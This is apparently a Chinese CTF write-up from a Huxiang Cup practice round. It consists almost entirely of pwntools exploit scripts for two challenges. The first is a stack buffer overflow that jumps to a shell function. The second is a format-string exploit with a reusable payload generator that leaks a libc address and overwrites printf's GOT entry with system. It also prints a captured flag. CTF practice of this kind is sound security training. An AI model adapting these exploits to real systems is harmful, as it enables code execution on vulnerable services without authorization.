湖湘杯练习赛

whoami

老题目

#!/usr/bin/env python
# coding=utf-8
from pwn import *
r = process("./whoami")
#r = remote("101.71.29.5",10013)
print r.recv()
r.sendline("1")
print r.recv()
shell_addr = 0x400896
payload = "a"*56+p64(shell_addr)
r.sendline(payload)
r.interactive()

# flag{927d379f30f26948d94a2285cd2d7bd7}

fmt

也是老题目

#!/usr/bin/env python2
# -*- coding: utf-8 -*-
from pwn import *

local = 1
host = '183.129.189.60' 
port = 10043
context.log_level = 'debug'
exe = './5c149c66064fa'
context.binary = exe
elf = ELF(exe)
libc = elf.libc


#don't forget to change it
if local:
    io = process(exe)
else:
    io = remote(host,port)

s    = lambda data            : io.send(str(data))
sa   = lambda delim,data      : io.sendafter(str(delim), str(data))
sl   = lambda data            : io.sendline(str(data))
sla  = lambda delim,data      : io.sendlineafter(str(delim), str(data))
r    = lambda numb=4096       : io.recv(numb)
ru   = lambda delim,drop=True : io.recvuntil(delim, drop)
uu32 = lambda data            : u32(data.ljust(4, '\x00'))
uu64 = lambda data            : u64(data.ljust(8, '\x00'))
lg   = lambda s,addr          : io.success('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))


# break on aim addr
def debug(addr,PIE=True):
    if PIE:
        text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(io.pid)).readlines()[1], 16)
        gdb.attach(io,'b *{}'.format(hex(text_base+addr)))
    else:
        gdb.attach(io,"b *{}".format(hex(addr)))


#===========================================================
#                    EXPLOIT GOES HERE
#===========================================================

# Arch:     amd64-64-little
# RELRO:    Partial RELRO
# Stack:    No canary found
# NX:       NX enabled
# PIE:      No PIE (0x400000)
def getAddr(write):
    xor = 0xff
    addr = []
    for i in range(6):
        result = (xor & write) >> (i * 8)
        if result != 0:
            addr.append(result)
        xor = xor * 0x100
    return addr

# 划分部分，按大小排序
def Partion(write, bewrite):
    addr = getAddr(write)
    part = []
    for i in range(len(addr)):
        part.append( (addr[i], p64(bewrite+i)) )
    part.sort(key=lambda tup: tup[0])
    return part

# 获得排序后的大小，升序
def sizeUp(part):
    size = []
    for i in range(len(part)):
        size.append(part[i][0])
    return size

# 打包地址
def packAddr(part):
    addr =''.join(x[1] for x in part)
    address = ''.join(addr)
    return address

# 自动计算偏移
def offsetDeal(size):
    length = 12 * len(size)
    if length % 8 != 0:
        offset = length / 8 + 1
    else:
        offset = length / 8
    length = offset * 8 
    offset += 6
    return offset, length


# 生成payload
def payloadGenerate(size, offset):
    payload = "%{}c%{}$hhn".format(size[0], offset)
    for i in range(1, len(size)):
        payload += "%{}c%{}$hhn".format(size[i]-size[i-1],offset+i)
    return payload

## 生成payload并对齐
def fmt_payload(bewrite,  write,  offset=0):
    part = Partion(write, bewrite)
    size = sizeUp(part)
    address = packAddr(part)

    result = offsetDeal(size)
    if offset == 0:
        offset = result[0]
    length = result[1]
    print 'offset is:' + str(offset)
    payload = payloadGenerate(size, offset)
    payload = payload.ljust(length, 'a')
    payload += address

    return payload
def exp():
    sl("%2$llx")
    libc.address = int(r(12),16) - 0x1bc590
    lg("libc_addr", libc.address)
    printf_got = elf.got['printf']
    system_addr = libc.symbols['system']
    payload = fmt_payload(printf_got, system_addr, 17)
    """
    gdb.attach(io,'''
               b printf
               c
               ''')
    """
    sl(payload)
    #gdb.attach(io)


if __name__ == '__main__':
    exp()
    io.interactive()

本文作者：NoOne
本文地址： https://noonegroup.xyz/posts/c820405f/
版权声明：转载请注明出处！